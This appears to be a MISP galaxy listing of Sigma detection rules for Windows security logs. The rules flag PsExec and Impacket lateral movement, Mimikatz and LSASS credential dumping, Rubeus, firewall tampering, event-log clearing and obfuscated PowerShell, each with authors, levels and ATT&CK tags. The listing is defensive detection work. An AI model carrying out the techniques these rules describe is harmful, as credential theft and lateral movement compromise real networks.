tags ['attack.lateral_movement', 'attack.t1021.002', 'attack.execution', 'attack.t1569.002']
Related clusters

To see the related clusters, click here.

PsExec Tool Execution From Suspicious Locations - PipeName

Detects PsExec default pipe creation where the image executed is located in a suspicious location. Which could indicate that the tool is being used in an attack

Internal MISP references

UUID 41504465-5e3a-4a5b-a5b4-2a0baadd4463 which can be used as unique global reference for PsExec Tool Execution From Suspicious Locations - PipeName in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/08/04
falsepositive ['Rare legitimate use of psexec from the locations mentioned above. This will require initial tuning based on your environment.']
filename pipe_created_sysinternals_psexec_default_pipe_susp_location.yml
level medium
logsource.category pipe_created
logsource.product windows
tags ['attack.execution', 'attack.t1569.002', 'attack.s0029']
Related clusters

To see the related clusters, click here.

Mimikatz Use

This method detects mimikatz keywords in different Eventlogs (some of them only appear in older Mimikatz version that are however still used by different threat groups)

Internal MISP references

UUID 06d71506-7beb-4f22-8888-e2e5e2ca7fd8 which can be used as unique global reference for Mimikatz Use in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), David ANDRE (additional keywords)
creation_date 2017/01/10
falsepositive ['Naughty administrators', 'AV Signature updates', 'Files with Mimikatz in their filename']
filename win_alert_mimikatz_keywords.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.s0002', 'attack.lateral_movement', 'attack.credential_access', 'car.2013-07-001', 'car.2019-04-004', 'attack.t1003.002', 'attack.t1003.004', 'attack.t1003.001', 'attack.t1003.006']
Related clusters

To see the related clusters, click here.

New Firewall Rule Added In Windows Firewall Exception List For Potential Suspicious Application

Detects the addition of a new rule to the Windows Firewall exception list for an application located in a potentially suspicious location.

Internal MISP references

UUID 9e2575e7-2cb9-4da1-adc8-ed94221dca5e which can be used as unique global reference for New Firewall Rule Added In Windows Firewall Exception List For Potential Suspicious Application in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2023/02/26
falsepositive ['Unknown']
filename win_firewall_as_add_rule_susp_folder.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562.004']
Related clusters

To see the related clusters, click here.

The Windows Defender Firewall Service Failed To Load Group Policy

Detects activity when The Windows Defender Firewall service failed to load Group Policy

Internal MISP references

UUID 7ec15688-fd24-4177-ba43-1a950537ee39 which can be used as unique global reference for The Windows Defender Firewall Service Failed To Load Group Policy in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/02/19
falsepositive No established falsepositives
filename win_firewall_as_failed_load_gpo.yml
level low
logsource.category No established category
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562.004']
Related clusters

To see the related clusters, click here.

A Rule Has Been Deleted From The Windows Firewall Exception List

Detects when a single rules or all of the rules have been deleted from the Windows Defender Firewall

Internal MISP references

UUID c187c075-bb3e-4c62-b4fa-beae0ffc211f which can be used as unique global reference for A Rule Has Been Deleted From The Windows Firewall Exception List in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/02/19
falsepositive No established falsepositives
filename win_firewall_as_delete_rule.yml
level medium
logsource.category No established category
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562.004']
Related clusters

To see the related clusters, click here.

Windows Defender Firewall Has Been Reset To Its Default Configuration

Detects activity when Windows Defender Firewall has been reset to its default configuration

Internal MISP references

UUID 04b60639-39c0-412a-9fbe-e82499c881a3 which can be used as unique global reference for Windows Defender Firewall Has Been Reset To Its Default Configuration in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/02/19
falsepositive No established falsepositives
filename win_firewall_as_reset_config.yml
level low
logsource.category No established category
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562.004']
Related clusters

To see the related clusters, click here.

All Rules Have Been Deleted From The Windows Firewall Configuration

Detects when a all the rules have been deleted from the Windows Defender Firewall configuration

Internal MISP references

UUID 79609c82-a488-426e-abcf-9f341a39365d which can be used as unique global reference for All Rules Have Been Deleted From The Windows Firewall Configuration in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113, Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/01/17
falsepositive No established falsepositives
filename win_firewall_as_delete_all_rules.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562.004']
Related clusters

To see the related clusters, click here.

Windows Firewall Settings Have Been Changed

Detects activity when the settings of the Windows firewall have been changed

Internal MISP references

UUID 00bb5bd5-1379-4fcf-a965-a5b6f7478064 which can be used as unique global reference for Windows Firewall Settings Have Been Changed in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113, Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/02/19
falsepositive No established falsepositives
filename win_firewall_as_setting_change.yml
level low
logsource.category No established category
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562.004']
Related clusters

To see the related clusters, click here.

Uncommon New Firewall Rule Added In Windows Firewall Exception List

Detects when a rule has been added to the Windows Firewall exception list

Internal MISP references

UUID cde0a575-7d3d-4a49-9817-b8004a7bf105 which can be used as unique global reference for Uncommon New Firewall Rule Added In Windows Firewall Exception List in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/02/19
falsepositive No established falsepositives
filename win_firewall_as_add_rule.yml
level medium
logsource.category No established category
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562.004']
Related clusters

To see the related clusters, click here.

Local User Creation

Detects local user creation on Windows servers, which shouldn't happen in an Active Directory environment. Apply this Sigma Use Case on your Windows server logs and not on your DC logs.

Internal MISP references

UUID 66b6be3d-55d0-4f47-9855-d69df21740ea which can be used as unique global reference for Local User Creation in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Patrick Bareiss
creation_date 2019/04/18
falsepositive ['Domain Controller Logs', 'Local accounts managed by privileged account management tools']
filename win_security_user_creation.yml
level low
logsource.category No established category
logsource.product windows
tags ['attack.persistence', 'attack.t1136.001']
Related clusters

To see the related clusters, click here.

Invoke-Obfuscation COMPRESS OBFUSCATION - Security

Detects Obfuscated Powershell via COMPRESS OBFUSCATION

Internal MISP references

UUID 7a922f1b-2635-4d6c-91ef-af228b198ad3 which can be used as unique global reference for Invoke-Obfuscation COMPRESS OBFUSCATION - Security in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Timur Zinniatullin, oscd.community
creation_date 2020/10/18
falsepositive ['Unknown']
filename win_security_invoke_obfuscation_via_compress_services_security.yml
level medium
logsource.category No established category
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1027', 'attack.execution', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

User Couldn't Call a Privileged Service 'LsaRegisterLogonProcess'

The 'LsaRegisterLogonProcess' function verifies that the application making the function call is a logon process by checking that it has the SeTcbPrivilege privilege set. Possible Rubeus tries to get a handle to LSA.

Internal MISP references

UUID 6daac7fc-77d1-449a-a71a-e6b4d59a0e54 which can be used as unique global reference for User Couldn't Call a Privileged Service 'LsaRegisterLogonProcess' in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Roberto Rodriguez (source), Ilyas Ochkov (rule), oscd.community
creation_date 2019/10/24
falsepositive ['Unknown']
filename win_security_user_couldnt_call_priv_service_lsaregisterlogonprocess.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.lateral_movement', 'attack.privilege_escalation', 'attack.t1558.003']
Related clusters

To see the related clusters, click here.

Addition of SID History to Active Directory Object

An attacker can use the SID history attribute to gain additional privileges.

Internal MISP references

UUID 2632954e-db1c-49cb-9936-67d1ef1d17d2 which can be used as unique global reference for Addition of SID History to Active Directory Object in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Thomas Patzke, @atc_project (improvements)
creation_date 2017/02/19
falsepositive ['Migration of an account into a new domain']
filename win_security_susp_add_sid_history.yml
level medium
logsource.category No established category
logsource.product windows
tags ['attack.persistence', 'attack.privilege_escalation', 'attack.t1134.005']
Related clusters

To see the related clusters, click here.

ISO Image Mounted

Detects the mount of an ISO image on an endpoint

Internal MISP references

UUID 0248a7bc-8a9a-4cd8-a57e-3ae8e073a073 which can be used as unique global reference for ISO Image Mounted in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Syed Hasan (@syedhasan009)
creation_date 2021/05/29
falsepositive ['Software installation ISO files']
filename win_security_iso_mount.yml
level medium
logsource.category No established category
logsource.product windows
tags ['attack.initial_access', 'attack.t1566.001']
Related clusters

To see the related clusters, click here.

Important Scheduled Task Deleted/Disabled

Detects when adversaries stop services or processes by deleting or disabling their respective scheduled tasks in order to conduct data destructive activities

Internal MISP references

UUID 7595ba94-cf3b-4471-aa03-4f6baa9e5fad which can be used as unique global reference for Important Scheduled Task Deleted/Disabled in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/12/05
falsepositive ['Unknown']
filename win_security_susp_scheduled_task_delete_or_disable.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.execution', 'attack.privilege_escalation', 'attack.persistence', 'attack.t1053.005']
Related clusters

To see the related clusters, click here.

Remote Access Tool Services Have Been Installed - Security

Detects service installation of different remote access tools software. These software are often abused by threat actors to perform

Internal MISP references

UUID c8b00925-926c-47e3-beea-298fd563728e which can be used as unique global reference for Remote Access Tool Services Have Been Installed - Security in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Connor Martin, Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/12/23
falsepositive ["The rule doesn't look for anything suspicious so false positives are expected. If you use one of the tools mentioned, comment it out"]
filename win_security_service_install_remote_access_software.yml
level medium
logsource.category No established category
logsource.product windows
tags ['attack.persistence', 'attack.t1543.003', 'attack.t1569.002']
Related clusters

To see the related clusters, click here.

Invoke-Obfuscation Via Use MSHTA - Security

Detects Obfuscated Powershell via use MSHTA in Scripts

Internal MISP references

UUID 9b8d9203-4e0f-4cd9-bb06-4cc4ea6d0e9a which can be used as unique global reference for Invoke-Obfuscation Via Use MSHTA - Security in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nikita Nazarov, oscd.community
creation_date 2020/10/09
falsepositive ['Unknown']
filename win_security_invoke_obfuscation_via_use_mshta_services_security.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1027', 'attack.execution', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

Potentially Suspicious AccessMask Requested From LSASS

Detects process handle on LSASS process with certain access mask

Internal MISP references

UUID 4a1b6da0-d94f-4fc3-98fc-2d9cb9e5ee76 which can be used as unique global reference for Potentially Suspicious AccessMask Requested From LSASS in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Roberto Rodriguez, Teymur Kheirkhabarov, Dimitrios Slamaris, Mark Russinovich, Aleksey Potapov, oscd.community (update)
creation_date 2019/11/01
falsepositive ['Legitimate software accessing LSASS process for legitimate reason; update the whitelist with it']
filename win_security_susp_lsass_dump_generic.yml
level medium
logsource.category No established category
logsource.product windows
tags ['attack.credential_access', 'car.2019-04-004', 'attack.t1003.001']
Related clusters

To see the related clusters, click here.

Failed Code Integrity Checks

Detects code integrity failures such as missing page hashes or corrupted drivers due unauthorized modification. This could be a sign of tampered binaries.

Internal MISP references

UUID 470ec5fa-7b4e-4071-b200-4c753100f49b which can be used as unique global reference for Failed Code Integrity Checks in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Thomas Patzke
creation_date 2019/12/03
falsepositive ['Disk device errors']
filename win_security_codeintegrity_check_failure.yml
level informational
logsource.category No established category
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1027.001']
Related clusters

To see the related clusters, click here.

Password Policy Enumerated

Detects when the password policy is enumerated.

Internal MISP references

UUID 12ba6a38-adb3-4d6b-91ba-a7fb248e3199 which can be used as unique global reference for Password Policy Enumerated in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Zach Mathis
creation_date 2023/05/19
falsepositive No established falsepositives
filename win_security_password_policy_enumerated.yml
level medium
logsource.category No established category
logsource.product windows
tags ['attack.discovery', 'attack.t1201']
Related clusters

To see the related clusters, click here.

Device Installation Blocked

Detects an installation of a device that is forbidden by the system policy

Internal MISP references

UUID c9eb55c3-b468-40ab-9089-db2862e42137 which can be used as unique global reference for Device Installation Blocked in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/10/14
falsepositive ['Unknown']
filename win_security_device_installation_blocked.yml
level medium
logsource.category No established category
logsource.product windows
tags ['attack.initial_access', 'attack.t1200']
Related clusters

To see the related clusters, click here.

Suspicious PsExec Execution

detects execution of psexec or paexec with renamed service name, this rule helps to filter out the noise if psexec is used for legit purposes or if attacker uses a different psexec client other than sysinternal one

Internal MISP references

UUID c462f537-a1e3-41a6-b5fc-b2c2cef9bf82 which can be used as unique global reference for Suspicious PsExec Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Samir Bousseaden
creation_date 2019/04/03
falsepositive ['Unknown']
filename win_security_susp_psexec.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.lateral_movement', 'attack.t1021.002']
Related clusters

To see the related clusters, click here.

Azure AD Health Monitoring Agent Registry Keys Access

This detection uses Windows security events to detect suspicious access attempts to the registry key of Azure AD Health monitoring agent. This detection requires an access control entry (ACE) on the system access control list (SACL) of the following securable object HKLM\SOFTWARE\Microsoft\Microsoft Online\Reporting\MonitoringAgent.

Internal MISP references

UUID ff151c33-45fa-475d-af4f-c2f93571f4fe which can be used as unique global reference for Azure AD Health Monitoring Agent Registry Keys Access in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC
creation_date 2021/08/26
falsepositive ['Unknown']
filename win_security_aadhealth_mon_agent_regkey_access.yml
level medium
logsource.category No established category
logsource.product windows
tags ['attack.discovery', 'attack.t1012']
Related clusters

To see the related clusters, click here.

WMI Persistence - Security

Detects suspicious WMI event filter and command line event consumer based on WMI and Security Logs.

Internal MISP references

UUID f033f3f3-fd24-4995-97d8-a3bb17550a88 which can be used as unique global reference for WMI Persistence - Security in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Gleb Sukhodolskiy, Timur Zinniatullin oscd.community
creation_date 2017/08/22
falsepositive ['Unknown (data set is too small; further testing needed)']
filename win_security_wmi_persistence.yml
level medium
logsource.category No established category
logsource.product windows
tags ['attack.persistence', 'attack.privilege_escalation', 'attack.t1546.003']
Related clusters

To see the related clusters, click here.

Password Protected ZIP File Opened

Detects the extraction of password protected ZIP archives. See the filename variable for more details on which file has been opened.

Internal MISP references

UUID 00ba9da1-b510-4f6b-b258-8d338836180f which can be used as unique global reference for Password Protected ZIP File Opened in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/05/09
falsepositive ['Legitimate used of encrypted ZIP files']
filename win_security_susp_opened_encrypted_zip.yml
level medium
logsource.category No established category
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1027']
Related clusters

To see the related clusters, click here.

Persistence and Execution at Scale via GPO Scheduled Task

Detect lateral movement using GPO scheduled task, usually used to deploy ransomware at scale

Internal MISP references

UUID a8f29a7b-b137-4446-80a0-b804272f3da2 which can be used as unique global reference for Persistence and Execution at Scale via GPO Scheduled Task in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Samir Bousseaden
creation_date 2019/04/03
falsepositive ["If the source IP is not localhost then it's super suspicious, better to monitor both local and remote changes to GPO scheduledtasks"]
filename win_security_gpo_scheduledtasks.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.persistence', 'attack.lateral_movement', 'attack.t1053.005']
Related clusters

To see the related clusters, click here.

Security Eventlog Cleared

One of the Windows Eventlogs has been cleared. e.g. caused by "wevtutil cl" command execution

Internal MISP references

UUID d99b79d2-0a6f-4f46-ad8b-260b6e17f982 which can be used as unique global reference for Security Eventlog Cleared in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2017/01/10
falsepositive ['Rollout of log collection agents (the setup routine often includes a reset of the local Eventlog)', 'System provisioning (system reset before the golden image creation)']
filename win_security_audit_log_cleared.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1070.001', 'car.2016-04-002']
Related clusters

To see the related clusters, click here.

Metasploit SMB Authentication

Alerts on Metasploit host's authentications on the domain.

Internal MISP references

UUID 72124974-a68b-4366-b990-d30e0b2a190d which can be used as unique global reference for Metasploit SMB Authentication in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Chakib Gzenayi (@Chak092), Hosni Mribah
creation_date 2020/05/06
falsepositive ['Linux hostnames composed of 16 characters.']
filename win_security_metasploit_authentication.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.lateral_movement', 'attack.t1021.002']
Related clusters

To see the related clusters, click here.

Hacktool Ruler

This events that are generated when using the hacktool Ruler by Sensepost

Internal MISP references

UUID 24549159-ac1b-479c-8175-d42aea947cae which can be used as unique global reference for Hacktool Ruler in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2017/05/31
falsepositive ['Go utilities that use staaldraad awesome NTLM library']
filename win_security_alert_ruler.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.discovery', 'attack.execution', 'attack.t1087', 'attack.t1114', 'attack.t1059', 'attack.t1550.002']
Related clusters

To see the related clusters, click here.

Malicious Service Installations

Detects known malicious service installs that only appear in cases of lateral movement, credential dumping, and other suspicious activities.

Internal MISP references

UUID cb062102-587e-4414-8efa-dbe3c7bf19c6 which can be used as unique global reference for Malicious Service Installations in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Daniil Yugoslavskiy, oscd.community (update)
creation_date 2017/03/27
falsepositive ['Unknown']
filename win_security_mal_service_installs.yml
level critical
logsource.category No established category
logsource.product windows
tags ['attack.persistence', 'attack.privilege_escalation', 'attack.t1003', 'car.2013-09-005', 'attack.t1543.003', 'attack.t1569.002']
Related clusters

To see the related clusters, click here.

Impacket PsExec Execution

Detects execution of Impacket's psexec.py.

Internal MISP references

UUID 32d56ea1-417f-44ff-822b-882873f5f43b which can be used as unique global reference for Impacket PsExec Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Bhabesh Raj
creation_date 2020/12/14
falsepositive ['Unknown']
filename win_security_impacket_psexec.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.lateral_movement', 'attack.t1021.002']
Related clusters

To see the related clusters, click here.

Remote Service Activity via SVCCTL Named Pipe

Detects remote service activity via remote access to the svcctl named pipe

Internal MISP references

UUID 586a8d6b-6bfe-4ad9-9d78-888cd2fe50c3 which can be used as unique global reference for Remote Service Activity via SVCCTL Named Pipe in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Samir Bousseaden
creation_date 2019/04/03
falsepositive ['Unknown']
filename win_security_svcctl_remote_service.yml
level medium
logsource.category No established category
logsource.product windows
tags ['attack.lateral_movement', 'attack.persistence', 'attack.t1021.002']
Related clusters

To see the related clusters, click here.

Windows Event Auditing Disabled

Detects scenarios where system auditing (i.e.: Windows event log auditing) is disabled. This may be used in a scenario where an entity would want to bypass local logging to evade detection when Windows event logging is enabled and reviewed. Also, it is recommended to turn off "Local Group Policy Object Processing" via GPO, which will make sure that Active Directory GPOs take precedence over local/edited computer policies via something such as "gpedit.msc". Please note, that disabling "Local Group Policy Object Processing" may cause an issue in scenarios of one off specific GPO modifications - however, it is recommended to perform these modifications in Active Directory anyways.

Internal MISP references

UUID 69aeb277-f15f-4d2d-b32a-55e883609563 which can be used as unique global reference for Windows Event Auditing Disabled in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author @neu5ron, Nasreddine Bencherchali (Nextron Systems)
creation_date 2017/11/19
falsepositive ['Unknown']
filename win_security_disable_event_auditing.yml
level low
logsource.category No established category
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562.002']
Related clusters

To see the related clusters, click here.

Invoke-Obfuscation Via Use Rundll32 - Security

Detects Obfuscated Powershell via use Rundll32 in Scripts

Internal MISP references

UUID cd0f7229-d16f-42de-8fe3-fba365fbcb3a which can be used as unique global reference for Invoke-Obfuscation Via Use Rundll32 - Security in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nikita Nazarov, oscd.community
creation_date 2020/10/09
falsepositive ['Unknown']
filename win_security_invoke_obfuscation_via_use_rundll32_services_security.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1027', 'attack.execution', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

User Logoff Event

Detects a user log-off activity. Could be used for example to correlate information during forensic investigations

Internal MISP references

UUID 0badd08f-c6a3-4630-90d3-6875cca440be which can be used as unique global reference for User Logoff Event in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/10/14
falsepositive ['Unknown']
filename win_security_user_logoff.yml
level informational
logsource.category No established category
logsource.product windows
tags ['attack.impact', 'attack.t1531']
Related clusters

To see the related clusters, click here.

Access To ADMIN$ Network Share

Detects access to ADMIN$ network share

Internal MISP references

UUID 098d7118-55bc-4912-a836-dc6483a8d150 which can be used as unique global reference for Access To ADMIN$ Network Share in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2017/03/04
falsepositive ['Legitimate administrative activity']
filename win_security_admin_share_access.yml
level low
logsource.category No established category
logsource.product windows
tags ['attack.lateral_movement', 'attack.t1021.002']
Related clusters

To see the related clusters, click here.

Secure Deletion with SDelete

Detects renaming of file while deletion with SDelete tool.

Internal MISP references

UUID 39a80702-d7ca-4a83-b776-525b1f86a36d which can be used as unique global reference for Secure Deletion with SDelete in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Thomas Patzke
creation_date 2017/06/14
falsepositive ['Legitimate usage of SDelete']
filename win_security_susp_sdelete.yml
level medium
logsource.category No established category
logsource.product windows
tags ['attack.impact', 'attack.defense_evasion', 'attack.t1070.004', 'attack.t1027.005', 'attack.t1485', 'attack.t1553.002', 'attack.s0195']
Related clusters

To see the related clusters, click here.

ADCS Certificate Template Configuration Vulnerability

Detects certificate creation with template allowing risk permission subject

Internal MISP references

UUID 5ee3a654-372f-11ec-8d3d-0242ac130003 which can be used as unique global reference for ADCS Certificate Template Configuration Vulnerability in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Orlinum , BlueDefenZer
creation_date 2021/11/17
falsepositive ['Administrator activity', 'Proxy SSL certificate with subject modification', 'Smart card enrollement']
filename win_security_adcs_certificate_template_configuration_vulnerability.yml
level low
logsource.category No established category
logsource.product windows
tags ['attack.privilege_escalation', 'attack.credential_access']

Register new Logon Process by Rubeus

Detects potential use of Rubeus via registered new trusted logon process

Internal MISP references

UUID 12e6d621-194f-4f59-90cc-1959e21e69f7 which can be used as unique global reference for Register new Logon Process by Rubeus in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Roberto Rodriguez (source), Ilyas Ochkov (rule), oscd.community
creation_date 2019/10/24
falsepositive ['Unknown']
filename win_security_register_new_logon_process_by_rubeus.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.lateral_movement', 'attack.privilege_escalation', 'attack.t1558.003']
Related clusters

To see the related clusters, click here.

DCERPC SMB Spoolss Named Pipe

Detects the use of the spoolss named pipe over SMB. This can be used to trigger the authentication via NTLM of any machine that has the spoolservice enabled.

Internal MISP references

UUID 214e8f95-100a-4e04-bb31-ef6cba8ce07e which can be used as unique global reference for DCERPC SMB Spoolss Named Pipe in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author OTR (Open Threat Research)
creation_date 2018/11/28
falsepositive ['Domain Controllers acting as printer servers too? :)']
filename win_security_dce_rpc_smb_spoolss_named_pipe.yml
level medium
logsource.category No established category
logsource.product windows
tags ['attack.lateral_movement', 'attack.t1021.002']
Related clusters

To see the related clusters, click here.

Invoke-Obfuscation Via Stdin - Security

Detects Obfuscated Powershell via Stdin in Scripts

Internal MISP references

UUID 80b708f3-d034-40e4-a6c8-d23b7a7db3d1 which can be used as unique global reference for Invoke-Obfuscation Via Stdin - Security in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nikita Nazarov, oscd.community
creation_date 2020/10/12
falsepositive ['Unknown']
filename win_security_invoke_obfuscation_via_stdin_services_security.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1027', 'attack.execution', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

Metasploit Or Impacket Service Installation Via SMB PsExec

Detects usage of Metasploit SMB PsExec (exploit/windows/smb/psexec) and Impacket psexec.py by triggering on specific service installation

Internal MISP references

UUID 6fb63b40-e02a-403e-9ffd-3bcc1d749442 which can be used as unique global reference for Metasploit Or Impacket Service Installation Via SMB PsExec in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Bartlomiej Czyz, Relativity
creation_date 2021/01/21
falsepositive ['Possible, different agents with a 8 character binary and a 4, 8 or 16 character service name']
filename win_security_metasploit_or_impacket_smb_psexec_service_install.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.lateral_movement', 'attack.t1021.002', 'attack.t1570', 'attack.execution', 'attack.t1569.002']
Related clusters

To see the related clusters, click here.

AD Object WriteDAC Access

Detects WRITE_DAC access to a domain object

Internal MISP references

UUID 028c7842-4243-41cd-be6f-12f3cf1a26c7 which can be used as unique global reference for AD Object WriteDAC Access in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Roberto Rodriguez @Cyb3rWard0g
creation_date 2019/09/12
falsepositive ['Unknown']
filename win_security_ad_object_writedac_access.yml
level critical
logsource.category No established category
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1222.001']
Related clusters

To see the related clusters, click here.

Kerberos Manipulation

Detects failed Kerberos TGT issue operation. This can be a sign of manipulations of TGT messages by an attacker.

Internal MISP references

UUID f7644214-0eb0-4ace-9455-331ec4c09253 which can be used as unique global reference for Kerberos Manipulation in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2017/02/10
falsepositive ['Faulty legacy applications']
filename win_security_susp_kerberos_manipulation.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.credential_access', 'attack.t1212']
Related clusters

To see the related clusters, click here.

First Time Seen Remote Named Pipe

This detection excludes known namped pipes accessible remotely and notify on newly observed ones, may help to detect lateral movement and remote exec using named pipes

Internal MISP references

UUID 52d8b0c6-53d6-439a-9e41-52ad442ad9ad which can be used as unique global reference for First Time Seen Remote Named Pipe in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Samir Bousseaden
creation_date 2019/04/03
falsepositive ['Update the excluded named pipe to filter out any newly observed legit named pipe']
filename win_security_lm_namedpipe.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.lateral_movement', 'attack.t1021.002']
Related clusters

To see the related clusters, click here.

Invoke-Obfuscation Obfuscated IEX Invocation - Security

Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the code block linked in the references

Internal MISP references

UUID fd0f5778-d3cb-4c9a-9695-66759d04702a which can be used as unique global reference for Invoke-Obfuscation Obfuscated IEX Invocation - Security in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Daniel Bohannon (@Mandiant/@FireEye), oscd.community
creation_date 2019/11/08
falsepositive ['Unknown']
filename win_security_invoke_obfuscation_obfuscated_iex_services_security.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1027']
Related clusters

To see the related clusters, click here.

Transferring Files with Credential Data via Network Shares

Transferring files with well-known filenames (sensitive files with credential data) using network shares

Internal MISP references

UUID 910ab938-668b-401b-b08c-b596e80fdca5 which can be used as unique global reference for Transferring Files with Credential Data via Network Shares in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Teymur Kheirkhabarov, oscd.community
creation_date 2019/10/22
falsepositive ['Transferring sensitive files for legitimate administration work by legitimate administrator']
filename win_security_transf_files_with_cred_data_via_network_shares.yml
level medium
logsource.category No established category
logsource.product windows
tags ['attack.credential_access', 'attack.t1003.002', 'attack.t1003.001', 'attack.t1003.003']
Related clusters

To see the related clusters, click here.

Remote PowerShell Sessions Network Connections (WinRM)

Detects basic PowerShell Remoting (WinRM) by monitoring for network inbound connections to ports 5985 OR 5986

Internal MISP references

UUID 13acf386-b8c6-4fe0-9a6e-c4756b974698 which can be used as unique global reference for Remote PowerShell Sessions Network Connections (WinRM) in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Roberto Rodriguez @Cyb3rWard0g
creation_date 2019/09/12
falsepositive ['Legitimate use of remote PowerShell execution']
filename win_security_remote_powershell_session.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.execution', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

Suspicious LDAP-Attributes Used

Detects the usage of particular AttributeLDAPDisplayNames, which are known for data exchange via LDAP by the tool LDAPFragger and are additionally not commonly used in companies.

